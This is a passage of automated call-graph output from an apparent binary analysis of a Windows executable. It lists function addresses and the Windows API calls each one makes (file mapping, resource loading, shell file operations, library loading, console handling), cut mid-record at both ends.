22572->22576 22584 7ff7e5ef12bc 33 API calls 22573->22584 22575->22602 22576->22575 22580 7ff7e5f142f7 UnmapViewOfFile MapViewOfFile 22576->22580 22587 7ff7e5ef1b70 31 API calls 22578->22587 22578->22641 22583 7ff7e5f149b5 22579->22583 22580->22575 22585 7ff7e5f14329 22580->22585 22582 7ff7e5f1452d 22713 7ff7e5f0a430 22582->22713 22588 7ff7e5f143b8 22584->22588 22747 7ff7e5f0dd08 33 API calls 2 library calls 22585->22747 22591 7ff7e5f148dd 22587->22591 22751 7ff7e5f13810 35 API calls 2 library calls 22588->22751 22595 7ff7e5ef1b70 31 API calls 22591->22595 22593 7ff7e5f14339 22748 7ff7e5f13810 35 API calls 2 library calls 22593->22748 22594 7ff7e5f0a430 4 API calls 22598 7ff7e5f1453f DialogBoxParamW 22594->22598 22599 7ff7e5f148e9 22595->22599 22596 7ff7e5f143c2 22596->22602 22605 7ff7e5f1468f 22596->22605 22613 7ff7e5f1458b 22598->22613 22601 7ff7e5ef1b70 31 API calls 22599->22601 22600 7ff7e5f14348 22749 7ff7e5efbd30 131 API calls 22600->22749 22604 7ff7e5f148f5 22601->22604 22602->22555 22609 7ff7e5ef1b70 31 API calls 22604->22609 22608 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22605->22608 22606 7ff7e5f1435d 22750 7ff7e5efbe7c 131 API calls shared_ptr 22606->22750 22608->22612 22610 7ff7e5f14901 22609->22610 22614 7ff7e5ef1b70 31 API calls 22610->22614 22611 7ff7e5f14370 22618 7ff7e5f1437f UnmapViewOfFile 22611->22618 22612->22552 22615 7ff7e5f1459e SleepEx 22613->22615 22616 7ff7e5f145a4 22613->22616 22617 7ff7e5f1490d 22614->22617 22615->22616 22619 7ff7e5f145b2 shared_ptr 22616->22619 22716 7ff7e5f0dac4 22616->22716 22620 7ff7e5ef1b70 31 API calls 22617->22620 22618->22575 22623 7ff7e5f145be DeleteObject 22619->22623 22622 7ff7e5f14919 22620->22622 22626 7ff7e5ef1b70 31 API calls 22622->22626 22624 7ff7e5f145d7 DeleteObject 22623->22624 22625 7ff7e5f145dd 22623->22625 22624->22625 22628 7ff7e5f14613 22625->22628 22629 7ff7e5f14625 22625->22629 22627 7ff7e5f14925 22626->22627 22630 7ff7e5ef1b70 31 API calls 22627->22630 22631 7ff7e5f13928 5 API calls 22628->22631 22742 7ff7e5f0d120 22629->22742 22632 7ff7e5f14931 22630->22632 22634 7ff7e5f14618 CloseHandle 22631->22634 22635 7ff7e5ef1b70 31 API calls 22632->22635 22634->22629 22637 7ff7e5f1493d 22635->22637 22639 7ff7e5ef1b70 31 API calls 22637->22639 22639->22641 22641->22570 22642->22514 22645->22510 22646->22513 22648 7ff7e5f15fe6 __scrt_dllmain_crt_thread_attach 22647->22648 22648->22530 22648->22531 22650 7ff7e5f241dc 22649->22650 22651 7ff7e5f15ff8 22650->22651 22654 7ff7e5f22110 22650->22654 22651->22531 22653 7ff7e5f183e0 7 API calls 2 library calls 22651->22653 22653->22531 22665 7ff7e5f22828 EnterCriticalSection 22654->22665 22667 7ff7e5f174a0 22666->22667 22667->22537 22667->22667 22669 7ff7e5f23bcd 22668->22669 22670 7ff7e5f23bd9 22668->22670 22673 7ff7e5f23a00 48 API calls 4 library calls 22669->22673 22670->22540 22672->22540 22673->22670 22752 7ff7e5efdc4c 22674->22752 22676 7ff7e5f0d0bd OleInitialize 22677 7ff7e5f0d0e3 22676->22677 22678 7ff7e5f0d109 SHGetMalloc 22677->22678 22678->22548 22680 7ff7e5f0d759 22679->22680 22683 7ff7e5f0d75e BuildCatchObjectHelperInternal 22679->22683 22681 7ff7e5ef1b70 31 API calls 22680->22681 22681->22683 22682 7ff7e5f0d78d BuildCatchObjectHelperInternal 22685 7ff7e5ef1b70 31 API calls 22682->22685 22686 7ff7e5f0d7bc BuildCatchObjectHelperInternal 22682->22686 22683->22682 22684 7ff7e5ef1b70 31 API calls 22683->22684 22684->22682 22685->22686 22687 7ff7e5ef1b70 31 API calls 22686->22687 22688 7ff7e5f0d7eb BuildCatchObjectHelperInternal 22686->22688 22687->22688 22688->22550 22690 7ff7e5f0eb96 22689->22690 22691 7ff7e5f0eb8e 22689->22691 22692 7ff7e5f0eb9e GetObjectW 22690->22692 22693 7ff7e5f0ebb3 22690->22693 22877 7ff7e5f0c260 FindResourceW 22691->22877 22692->22693 22695 7ff7e5f0c12c 4 API calls 22693->22695 22696 7ff7e5f0ebc8 22695->22696 22697 7ff7e5f0ec1e 22696->22697 22698 7ff7e5f0ebee 22696->22698 22699 7ff7e5f0c260 10 API calls 22696->22699 22708 7ff7e5ef9cac 22697->22708 22891 7ff7e5f0c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22698->22891 22701 7ff7e5f0ebda 22699->22701 22701->22698 22703 7ff7e5f0ebe2 DeleteObject 22701->22703 22702 7ff7e5f0ebf7 22704 7ff7e5f0c15c 4 API calls 22702->22704 22703->22698 22705 7ff7e5f0ec02 22704->22705 22892 7ff7e5f0ca30 16 API calls _handle_error 22705->22892 22707 7ff7e5f0ec0f DeleteObject 22707->22697 22893 7ff7e5ef9cdc 22708->22893 22710 7ff7e5ef9cba 22960 7ff7e5efa83c GetModuleHandleW FindResourceW 22710->22960 22712 7ff7e5ef9cc2 22712->22582 22714 7ff7e5f15ae0 4 API calls 22713->22714 22715 7ff7e5f0a476 22714->22715 22715->22594 22717 7ff7e5f0db0a 22716->22717 22718 7ff7e5f0db76 22716->22718 22719 7ff7e5ef12bc 33 API calls 22717->22719 22720 7ff7e5ef1b70 31 API calls 22718->22720 22723 7ff7e5f0db91 22718->22723 22721 7ff7e5f0db34 22719->22721 22720->22723 22724 7ff7e5ef8b28 47 API calls 22721->22724 22722 7ff7e5f0dcce 22725 7ff7e5f15c30 _handle_error 8 API calls 22722->22725 22723->22722 22726 7ff7e5ef8cf8 SetCurrentDirectoryW 22723->22726 22727 7ff7e5f0dd01 22723->22727 22728 7ff7e5f0db48 22724->22728 22729 7ff7e5f0dcdf 22725->22729 22730 7ff7e5f0dbec 22726->22730 22732 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22727->22732 22983 7ff7e5f00ad0 CompareStringW 22728->22983 22729->22619 22731 7ff7e5ef2314 33 API calls 22730->22731 22734 7ff7e5f0dc1b 22731->22734 22735 7ff7e5f0dd07 22732->22735 22736 7ff7e5f0dc26 22734->22736 22984 7ff7e5ef1734 33 API calls 4 library calls 22734->22984 22737 7ff7e5f0dc55 SHFileOperationW 22736->22737 22737->22722 22739 7ff7e5f0dca1 22737->22739 22739->22722 22740 7ff7e5f0dcfc 22739->22740 22741 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22740->22741 22741->22727 22743 7ff7e5f0d13d 22742->22743 22744 7ff7e5f0d146 OleUninitialize 22743->22744 22745 7ff7e5f5f2e0 22744->22745 22746->22566 22747->22593 22748->22600 22749->22606 22750->22611 22751->22596 22753 7ff7e5ef13c4 33 API calls 22752->22753 22754 7ff7e5efdc94 GetSystemDirectoryW 22753->22754 22755 7ff7e5efdcb9 22754->22755 22773 7ff7e5efdcb2 22754->22773 22758 7ff7e5ef12bc 33 API calls 22755->22758 22756 7ff7e5efde4c 22757 7ff7e5f15c30 _handle_error 8 API calls 22756->22757 22760 7ff7e5efde60 22757->22760 22761 7ff7e5efdcf1 22758->22761 22759 7ff7e5efde79 22762 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22759->22762 22760->22676 22764 7ff7e5ef12bc 33 API calls 22761->22764 22763 7ff7e5efde7e 22762->22763 22766 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22763->22766 22765 7ff7e5efdd19 22764->22765 22768 7ff7e5ef88f8 33 API calls 22765->22768 22767 7ff7e5efde84 22766->22767 22769 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22767->22769 22772 7ff7e5efdd2b 22768->22772 22770 7ff7e5efde8a 22769->22770 22774 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22770->22774 22771 7ff7e5efddb5 LoadLibraryExW 22771->22773 22772->22763 22772->22767 22772->22771 22773->22756 22773->22759 22773->22770 22775 7ff7e5efde90 _snwprintf 22774->22775 22776 7ff7e5efdeb8 GetModuleHandleW 22775->22776 22777 7ff7e5efdf3f 22776->22777 22778 7ff7e5efdeea GetProcAddress 22776->22778 22779 7ff7e5efe3c7 22777->22779 22866 7ff7e5f1ec3c 39 API calls _snwprintf 22777->22866 22780 7ff7e5efdeff 22778->22780 22781 7ff7e5efdf17 GetProcAddress 22778->22781 22783 7ff7e5ef7c10 34 API calls 22779->22783 22780->22781 22781->22777 22784 7ff7e5efdf2c 22781->22784 22786 7ff7e5efe3d0 22783->22786 22784->22777 22785 7ff7e5efe274 22785->22779 22787 7ff7e5efe27e 22785->22787 22788 7ff7e5ef8b28 47 API calls 22786->22788 22789 7ff7e5ef7c10 34 API calls 22787->22789 22817 7ff7e5efe3de 22788->22817 22790 7ff7e5efe287 CreateFileW 22789->22790 22792 7ff7e5efe3b4 CloseHandle 22790->22792 22793 7ff7e5efe2c7 SetFilePointer 22790->22793 22795 7ff7e5ef1b70 31 API calls 22792->22795 22793->22792 22794 7ff7e5efe2e0 ReadFile 22793->22794 22794->22792 22796 7ff7e5efe308 22794->22796 22795->22779 22798 7ff7e5efe6c4 22796->22798 22799 7ff7e5efe31c 22796->22799 22797 7ff7e5efdc4c 77 API calls 22797->22817 22874 7ff7e5f15df4 8 API calls 22798->22874 22803 7ff7e5ef12bc 33 API calls 22799->22803 22801 7ff7e5efe402 CompareStringW 22801->22817 22802 7ff7e5ef12bc 33 API calls 22802->22817 22808 7ff7e5efe353 22803->22808 22804 7ff7e5ef8dc4 47 API calls 22804->22817 22806 7ff7e5efe4fe 22809 7ff7e5efe686 22806->22809 22810 7ff7e5efe50c 22806->22810 22807 7ff7e5ef1b70 31 API calls 22807->22817 22812 7ff7e5efe39f 22808->22812 22818 7ff7e5efdc4c 77 API calls 22808->22818 22867 7ff7e5efcf98 33 API calls 22808->22867 22816 7ff7e5ef1b70 31 API calls 22809->22816 22868 7ff7e5ef8be4 47 API calls 22810->22868 22811 7ff7e5ef5890 51 API calls 22811->22817 22819 7ff7e5ef1b70 31 API calls 22812->22819 22813 7ff7e5efe6ef 22822 7ff7e5efe709 SetThreadExecutionState 22813->22822 22876 7ff7e5ef3b84 RtlPcToFileHeader RaiseException _com_raise_error 22813->22876 22814 7ff7e5efe6c9 22814->22813 22875 7ff7e5ef3b84 RtlPcToFileHeader RaiseException _com_raise_error 22814->22875 22823 7ff7e5efe68f 22816->22823 22817->22797 22817->22801 22817->22802 22817->22804 22817->22807 22817->22811 22844 7ff7e5efe490 22817->22844 22861 7ff7e5ef6768 22817->22861 22818->22808 22824 7ff7e5efe3a9 22819->22824 22821 7ff7e5efe515 22825 7ff7e5ef6768 9 API calls 22821->22825 22828 7ff7e5ef1b70 31 API calls 22823->22828 22829 7ff7e5ef1b70 31 API calls 22824->22829 22830 7ff7e5efe51a 22825->22830 22826 7ff7e5ef12bc 33 API calls 22826->22844 22831 7ff7e5efe699 22828->22831 22829->22792 22832 7ff7e5efe525 22830->22832 22833 7ff7e5efe5ca 22830->22833 22835 7ff7e5f15c30 _handle_error 8 API calls 22831->22835 22836 7ff7e5efdc4c 77 API calls 22832->22836 22872 7ff7e5efda04 48 API calls 22833->22872 22834 7ff7e5ef8dc4 47 API calls 22834->22844 22838 7ff7e5efe6a8 22835->22838 22839 7ff7e5efe531 22836->22839 22838->22676 22845 7ff7e5efdc4c 77 API calls 22839->22845 22840 7ff7e5efe60f AllocConsole 22842 7ff7e5efe5bf 22840->22842 22843 7ff7e5efe619 GetCurrentProcessId AttachConsole 22840->22843 22841 7ff7e5ef1b70 31 API calls 22841->22844 22873 7ff7e5ef19d0 31 API calls _invalid_parameter_noinfo_noreturn 22842->22873 22847 7ff7e5efe630 22843->22847 22844->22806 22844->22826 22844->22834 22844->22841 22848 7ff7e5ef5890 51 API calls 22844->22848 22846 7ff7e5efe53d 22845->22846 22849 7ff7e5efaee0 48 API calls 22846->22849 22854 7ff7e5efe63c GetStdHandle WriteConsoleW Sleep FreeConsole 22847->22854 22848->22844 22851 7ff7e5efe569 22849->22851 22869 7ff7e5efda04 48 API calls 22851->22869 22852 7ff7e5efe67d ExitProcess 22854->22842 22855 7ff7e5efe587 22856 7ff7e5efaee0 48 API calls 22855->22856 22857 7ff7e5efe592 22856->22857 22870 7ff7e5efdb98 33 API calls 22857->22870 22859 7ff7e5efe59e 22871 7ff7e5ef19d0 31 API calls _invalid_parameter_noinfo_noreturn 22859->22871 22862 7ff7e5ef678c GetVersionExW 22861->22862 22863 7ff7e5ef67bf 22861->22863 22862->22863 22864 7ff7e5f15c30 _handle_error 8 API calls 22863->22864 22865 7ff7e5ef67ec 22864->22865 22865->22817 22866->22785 22867->22808 22868->22821 22869->22855 22870->22859 22871->22842 22872->22840 22873->22852 22874->22814 22875->22813 22876->22822 22878 7ff7e5f0c28b SizeofResource 22877->22878 22882 7ff7e5f0c3d7 22877->22882 22879 7ff7e5f0c2a5 LoadResource 22878->22879 22878->22882 22880 7ff7e5f0c2be LockResource 22879->22880 22879->22882 22881 7ff7e5f0c2d3 GlobalAlloc 22880->22881 22880->22882 22881->22882 22883 7ff7e5f0c2f4 GlobalLock 22881->22883 22882->22690 22884 7ff7e5f0c3ce GlobalFree 22883->22884 22885 7ff7e5f0c306 BuildCatchObjectHelperInternal 22883->22885 22884->22882 22886 7ff7e5f0c314 CreateStreamOnHGlobal 22885->22886 22887 7ff7e5f0c3c5 GlobalUnlock 22886->22887 22888 7ff7e5f0c332 22886->22888 22887->22884 22888->22887 22889 7ff7e5f0c3ae 22888->22889 22890 7ff7e5f0c396 GdipCreateHBITMAPFromBitmap 22888->22890 22889->22887 22890->22889 22891->22702 22892->22707 22896 7ff7e5ef9cfe _snwprintf 22893->22896 22894 7ff7e5ef9d73 22970 7ff7e5ef806c 48 API calls 22894->22970 22896->22894 22898 7ff7e5ef9e89 22896->22898 22897 7ff7e5ef1b70 31 API calls 22899 7ff7e5ef9dfd 22897->22899 22898->22899 22901 7ff7e5ef1c80 33 API calls 22898->22901 22903 7ff7e5ef46a0 54 API calls 22899->22903 22900 7ff7e5ef9d7d BuildCatchObjectHelperInternal 22900->22897 22958 7ff7e5efa82e 22900->22958 22901->22899 22902 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22904 7ff7e5efa834 22902->22904 22905 7ff7e5ef9e1a 22903->22905 22907 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22904->22907 22906 7ff7e5ef9e22 22905->22906 22915 7ff7e5ef9ead 22905->22915 22908 7ff7e5ef424c 100 API calls 22906->22908 22910 7ff7e5efa83a 22907->22910 22912 7ff7e5ef9e2b 22908->22912 22909 7ff7e5ef9f17 22962 7ff7e5f1d800 22909->22962 22912->22904 22914 7ff7e5ef9e66 22912->22914 22918 7ff7e5f15c30 _handle_error 8 API calls 22914->22918 22915->22909 22916 7ff7e5ef9254 33 API calls 22915->22916 22916->22915 22917 7ff7e5f1d800 31 API calls 22930 7ff7e5ef9f57 __vcrt_InitializeCriticalSectionEx 22917->22930 22919 7ff7e5efa80e 22918->22919 22919->22710 22920 7ff7e5ef4c40 101 API calls 22923 7ff7e5efa0a1 22920->22923 22921 7ff7e5ef4d50 101 API calls 22921->22930 22922 7ff7e5ef4a70 104 API calls 22922->22930 22924 7ff7e5ef4a70 104 API calls 22923->22924 22933 7ff7e5efa15c 22923->22933 22931 7ff7e5efa0c9 22924->22931 22925 7ff7e5ef424c 100 API calls 22927 7ff7e5efa7f5 22925->22927 22926 7ff7e5ef4c40 101 API calls 22926->22930 22928 7ff7e5ef1b70 31 API calls 22927->22928 22928->22914 22929 7ff7e5efa089 22929->22920 22929->22933 22930->22921 22930->22922 22930->22926 22930->22929 22930->22933 22931->22933 22954 7ff7e5efa0d7 __vcrt_InitializeCriticalSectionEx 22931->22954 22971 7ff7e5f0033c MultiByteToWideChar 22931->22971 22933->22925 22934 7ff7e5efa5ec 22947 7ff7e5efa6c2 22934->22947 22977 7ff7e5f20498 31 API calls 2 library calls 22934->22977 22936 7ff7e5efa557 22936->22934 22974 7ff7e5f20498 31 API calls 2 library calls 22936->22974 22937 7ff7e5efa54b 22937->22710 22940 7ff7e5efa7a2 22943 7ff7e5f1d800 31 API calls 22940->22943 22941 7ff7e5efa649 22978 7ff7e5f1ecc4 31 API calls _invalid_parameter_noinfo_noreturn 22941->22978 22942 7ff7e5efa6ae 22942->22947 22979 7ff7e5ef90cc 33 API calls Concurrency::cancel_current_task 22942->22979 22946 7ff7e5efa7cb 22943->22946 22944 7ff7e5ef9254 33 API calls 22944->22947 22949 7ff7e5f1d800 31 API calls 22946->22949 22947->22940 22947->22944 22948 7ff7e5efa56d 22975 7ff7e5f1ecc4 31 API calls _invalid_parameter_noinfo_noreturn 22948->22975 22949->22933 22951 7ff7e5efa5d8 22951->22934 22976 7ff7e5ef90cc 33 API calls Concurrency::cancel_current_task 22951->22976 22952 7ff7e5f00688 WideCharToMultiByte 22952->22954 22954->22933 22954->22934 22954->22936 22954->22937 22954->22952 22955 7ff7e5efa829 22954->22955 22972 7ff7e5efae88 45 API calls _snwprintf 22954->22972 22973 7ff7e5f1d62c 31 API calls 2 library calls 22954->22973 22980 7ff7e5f15df4 8 API calls 22955->22980 22958->22902 22961 7ff7e5efa868 22960->22961 22961->22712 22963 7ff7e5f1d82d 22962->22963 22969 7ff7e5f1d842 22963->22969 22981 7ff7e5f20bac 15 API calls _invalid_parameter_noinfo_noreturn 22963->22981 22965 7ff7e5f1d837 22982 7ff7e5f1ae74 31 API calls _invalid_parameter_noinfo_noreturn 22965->22982 22967 7ff7e5f15c30 _handle_error 8 API calls 22968 7ff7e5ef9f37 22967->22968 22968->22917 22969->22967 22970->22900 22971->22954 22972->22954 22973->22954 22974->22948 22975->22951 22976->22934 22977->22941 22978->22942 22979->22947 22980->22958 22981->22965 22982->22969 22983->22718 22984->22737 22985 7ff7e5f047f0 22986 7ff7e5ef8e0c 33 API calls 22985->22986 22987 7ff7e5f04835 22986->22987 22988 7ff7e5ef6288 55 API calls 22987->22988 22989 7ff7e5f04866 22988->22989 22990 7ff7e5f04909 22989->22990 22993 7ff7e5f04931 22989->22993 22997 7ff7e5f04936 22989->22997 22991 7ff7e5f15c30 _handle_error 8 API calls 22990->22991 22994 7ff7e5f0491c 22991->22994 22992 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22995 7ff7e5f0493c 22992->22995 22996 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22993->22996 22996->22997 22997->22992 22998 7ff7e5ef32f0 22999 7ff7e5ef3327 22998->22999 23003 7ff7e5ef33c3 22999->23003 23006 7ff7e5ef335b 22999->23006 23007 7ff7e5ef33ee 22999->23007 23011 7ff7e5ef6858 22999->23011 23034 7ff7e5efdacc 22999->23034 23000 7ff7e5f15c30 _handle_error 8 API calls 23001 7ff7e5ef33dd 23000->23001 23005 7ff7e5ef1b70 31 API calls 23003->23005 23005->23006 23006->23000 23008 7ff7e5ef33ff 23007->23008 23038 7ff7e5efd9b4 CompareStringW 23007->23038 23008->23003 23010 7ff7e5ef1c80 33 API calls 23008->23010 23010->23003 23014 7ff7e5ef6898 23011->23014 23012 7ff7e5ef6962 23039 7ff7e5ef6ae8 23012->23039 23014->23012 23018 7ff7e5ef68d6 __vcrt_InitializeCriticalSectionEx 23014->23018 23046 7ff7e5f00ad0 CompareStringW 23014->23046 23015 7ff7e5f15c30 _handle_error 8 API calls 23016 7ff7e5ef6ac7 23015->23016 23016->22999 23021 7ff7e5ef68fd 23018->23021 23023 7ff7e5ef6946 __vcrt_InitializeCriticalSectionEx 23018->23023 23047 7ff7e5f00ad0 CompareStringW 23018->23047 23019 7ff7e5ef6a85 23019->23021 23049 7ff7e5efd9d0 CompareStringW 23019->23049 23021->23015 23023->23012 23023->23021 23024 7ff7e5ef69fd 23023->23024 23025 7ff7e5ef12bc 33 API calls 23023->23025 23030 7ff7e5ef6a6a __vcrt_InitializeCriticalSectionEx 23023->23030 23028 7ff7e5ef6adf 23024->23028 23029 7ff7e5ef6a4d 23024->23029 23026 7ff7e5ef69ea 23025->23026 23027 7ff7e5ef885c 8 API calls 23026->23027 23027->23024 23032 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23028->23032 23029->23021 23029->23030 23048 7ff7e5f00ad0 CompareStringW 23029->23048 23030->23012 23030->23019 23030->23021 23033 7ff7e5ef6ae4 23032->23033 23036 7ff7e5efdadf 23034->23036 23035 7ff7e5efdafd 23035->22999 23036->23035 23037 7ff7e5ef1c80 33 API calls 23036->23037 23037->23035 23038->23008 23042 7ff7e5ef6b14 23039->23042 23040 7ff7e5ef6c1d 23041 7ff7e5ef6ae8 CompareStringW 23040->23041 23044 7ff7e5ef6bc1 23040->23044 23041->23040 23042->23040 23043 7ff7e5ef6c02 23042->23043 23042->23044 23043->23044 23050 7ff7e5efd9d0 CompareStringW 23043->23050 23044->23021 23046->23018 23047->23023 23048->23030 23049->23021 23050->23044 23067 7ff7e5f09c49 8 API calls _handle_error 23302 7ff7e5f14d50 23303 7ff7e5f14c83 23302->23303 23304 7ff7e5f15390 _com_raise_error 14 API calls 23303->23304 23304->23303 20734 7ff7e5f20e5c 20735 7ff7e5f20ea7 20734->20735 20739 7ff7e5f20e6b _invalid_parameter_noinfo_noreturn 20734->20739 20744 7ff7e5f20bac 15 API calls _invalid_parameter_noinfo_noreturn 20735->20744 20736 7ff7e5f20e8e HeapAlloc 20738 7ff7e5f20ea5 20736->20738 20736->20739 20739->20735 20739->20736 20741 7ff7e5f1f0c8 20739->20741 20745 7ff7e5f1f108 20741->20745 20744->20738 20750 7ff7e5f22828 EnterCriticalSection 20745->20750 22479 7ff7e5ef5db8 22480 7ff7e5ef5dfa 22479->22480 22481 7ff7e5ef5890 51 API calls 22480->22481 22482 7ff7e5ef5e2d 22481->22482 22483 7ff7e5ef5e44 CreateFileW 22482->22483 22484 7ff7e5ef5ff4 51 API calls 22482->22484 22486 7ff7e5ef5e8f 22483->22486 22495 7ff7e5ef5f29 22483->22495 22484->22483 22487 7ff7e5ef80b0 49 API calls 22486->22487 22488 7ff7e5ef5eb2 22487->22488 22490 7ff7e5ef5eee 22488->22490 22491 7ff7e5ef5eb8 CreateFileW 22488->22491 22489 7ff7e5ef5f81 SetFileTime CloseHandle 22492 7ff7e5ef5fc1 22489->22492 22493 7ff7e5ef5fcc 22489->22493 22490->22495 22497 7ff7e5ef5fec 22490->22497 22491->22490 22494 7ff7e5ef5ff4 51 API calls 22492->22494 22496 7ff7e5f15c30 _handle_error 8 API calls 22493->22496 22494->22493 22495->22489 22495->22493 22498 7ff7e5ef5fd8 22496->22498 22499 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22497->22499 22500 7ff7e5ef5ff1 22499->22500 23084 7ff7e5f03e60 23085 7ff7e5f03ec2 23084->23085 23088 7ff7e5f03f05 23084->23088 23133 7ff7e5f04ee4 23085->23133 23089 7ff7e5f03fb4 23088->23089 23131 7ff7e5ef4c40 101 API calls 23088->23131 23091 7ff7e5f03fe0 23089->23091 23123 7ff7e5f04049 23089->23123 23090 7ff7e5ef552c 56 API calls 23092 7ff7e5f03edd 23090->23092 23095 7ff7e5f04023 23091->23095 23099 7ff7e5f03fea 23091->23099 23094 7ff7e5f04ee4 59 API calls 23092->23094 23093 7ff7e5f03f8c 23149 7ff7e5ef4e00 SetEndOfFile 23093->23149 23097 7ff7e5f03ee2 23094->23097 23150 7ff7e5f05b60 23095->23150 23097->23088 23101 7ff7e5f03ee6 23097->23101 23170 7ff7e5ef4160 82 API calls 23099->23170 23100 7ff7e5f03f98 23132 7ff7e5ef4c40 101 API calls 23100->23132 23169 7ff7e5ef3a9c 99 API calls 23101->23169 23105 7ff7e5f0412c 23106 7ff7e5f04031 23105->23106 23107 7ff7e5f04d74 104 API calls 23105->23107 23111 7ff7e5f04168 23106->23111 23187 7ff7e5ef3c7c 82 API calls 23106->23187 23107->23106 23108 7ff7e5f15c30 _handle_error 8 API calls 23112 7ff7e5f042f0 23108->23112 23109 7ff7e5f04000 23110 7ff7e5f04940 106 API calls 23109->23110 23122 7ff7e5f03efc 23109->23122 23113 7ff7e5f04013 23110->23113 23130 7ff7e5f041fd 23111->23130 23188 7ff7e5f08db4 8 API calls 23111->23188 23116 7ff7e5ef5790 51 API calls 23113->23116 23116->23122 23118 7ff7e5f04244 23119 7ff7e5f042c1 23118->23119 23121 7ff7e5f042cf 23118->23121 23190 7ff7e5ef4e00 SetEndOfFile 23118->23190 23119->23121 23161 7ff7e5f04940 23119->23161 23121->23122 23126 7ff7e5ef5790 51 API calls 23121->23126 23122->23108 23123->23105 23171 7ff7e5f0511c 23123->23171 23180 7ff7e5f000f0 23123->23180 23183 7ff7e5f04d74 23123->23183 23126->23122 23128 7ff7e5f0418e 23129 7ff7e5f0511c 120 API calls 23128->23129 23128->23130 23129->23128 23130->23118 23189 7ff7e5ef38e0 82 API calls 2 library calls 23130->23189 23131->23093 23132->23089 23134 7ff7e5ef6288 55 API calls 23133->23134 23135 7ff7e5f04f42 23134->23135 23136 7ff7e5f04f5b 23135->23136 23138 7ff7e5f04f53 23135->23138 23137 7ff7e5f15ae0 4 API calls 23136->23137 23140 7ff7e5f04f65 23137->23140 23191 7ff7e5ef5db0 51 API calls 2 library calls 23138->23191 23141 7ff7e5ef4334 51 API calls 23140->23141 23143 7ff7e5f04f94 23141->23143 23142 7ff7e5f04ffb 23144 7ff7e5f15c30 _handle_error 8 API calls 23142->23144 23143->23142 23145 7ff7e5f05023 23143->23145 23146 7ff7e5f03ec7 23144->23146 23147 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23145->23147 23146->23088 23146->23090 23148 7ff7e5f05028 23147->23148 23149->23100 23155 7ff7e5f05b99 23150->23155 23151 7ff7e5f0511c 120 API calls 23151->23155 23155->23151 23156 7ff7e5f000f0 SendDlgItemMessageW 23155->23156 23157 7ff7e5f05e0e 23155->23157 23158 7ff7e5f05d91 23155->23158 23160 7ff7e5ef4d50 101 API calls 23155->23160 23192 7ff7e5f06294 23155->23192 23214 7ff7e5f06b60 23155->23214 23223 7ff7e5f0699c 125 API calls _handle_error 23155->23223 23156->23155 23157->23106 23158->23157 23159 7ff7e5f04d74 104 API calls 23158->23159 23159->23157 23160->23155 23162 7ff7e5f0495a 23161->23162 23167 7ff7e5f049b2 23161->23167 23233 7ff7e5ef4c70 23162->23233 23164 7ff7e5f04a2d 23164->23121 23165 7ff7e5f0499e 23168 7ff7e5ef42d0 100 API calls 23165->23168 23166 7ff7e5ef5ff4 51 API calls 23166->23164 23167->23164 23167->23166 23168->23167 23169->23122 23170->23109 23172 7ff7e5f05137 23171->23172 23178 7ff7e5f0512f 23171->23178 23173 7ff7e5f0518a 23172->23173 23174 7ff7e5f053bc 120 API calls 23172->23174 23172->23178 23173->23178 23238 7ff7e5f08d6c 8 API calls 23173->23238 23175 7ff7e5f05176 23174->23175 23175->23173 23177 7ff7e5f051e1 23175->23177 23175->23178 23239 7ff7e5ef3df0 99 API calls 2 library calls 23177->23239 23178->23123 23180->23123 23181 7ff7e5f13a80 23180->23181 23182 7ff7e5f13a8f SendDlgItemMessageW 23181->23182 23185 7ff7e5f04dad 23183->23185 23184 7ff7e5f04dd3 23184->23123 23185->23184 23240 7ff7e5ef4e18 23185->23240 23187->23111 23188->23128 23189->23118 23190->23119 23191->23136 23194 7ff7e5f062eb memcpy_s 23192->23194 23193 7ff7e5f0511c 120 API calls 23193->23194 23194->23193 23196 7ff7e5f0633d 23194->23196 23195 7ff7e5f0511c 120 API calls 23195->23196 23196->23195 23198 7ff7e5f0639f 23196->23198 23213 7ff7e5f0650a 23196->23213 23197 7ff7e5f15c30 _handle_error 8 API calls 23200 7ff7e5f0697b 23197->23200 23199 7ff7e5f0511c 120 API calls 23198->23199 23203 7ff7e5f063f8 23198->23203 23198->23213 23199->23198 23200->23155 23201 7ff7e5f064a2 23224 7ff7e5f0569c 23201->23224 23203->23201 23204 7ff7e5f0511c 120 API calls 23203->23204 23203->23213 23204->23203 23205 7ff7e5f06500 23207 7ff7e5f0674c 23205->23207 23209 7ff7e5f0511c 120 API calls 23205->23209 23205->23213 23206 7ff7e5f0569c 8 API calls 23208 7ff7e5f067c0 23206->23208 23207->23206 23210 7ff7e5f0569c 8 API calls 23208->23210 23208->23213 23209->23205 23211 7ff7e5f06896 23210->23211 23211->23213 23228 7ff7e5f05e44 23211->23228 23213->23197 23215 7ff7e5f06ba8 23214->23215 23216 7ff7e5f0511c 120 API calls 23215->23216 23217 7ff7e5f06bdf 23215->23217 23216->23215 23218 7ff7e5f06bee 23217->23218 23219 7ff7e5f0511c 120 API calls 23217->23219 23221 7ff7e5f06c2d 23217->23221 23218->23155 23219->23217 23220 7ff7e5f0511c 120 API calls 23220->23221 23221->23218 23221->23220 23222 7ff7e5f04d74 104 API calls 23221->23222 23222->23221 23223->23155 23227 7ff7e5f056fe memcpy_s 23224->23227 23225 7ff7e5f15c30 _handle_error 8 API calls 23226 7ff7e5f05ae9 23225->23226 23226->23205 23227->23225 23232 7ff7e5f05ea7 23228->23232 23229 7ff7e5f06260 23229->23213 23230 7ff7e5f04d74 104 API calls 23230->23232 23231 7ff7e5f0511c 120 API calls 23231->23232 23232->23229 23232->23230 23232->23231 23234 7ff7e5ef4c94 23233->23234 23236 7ff7e5ef4ca4 23233->23236 23235 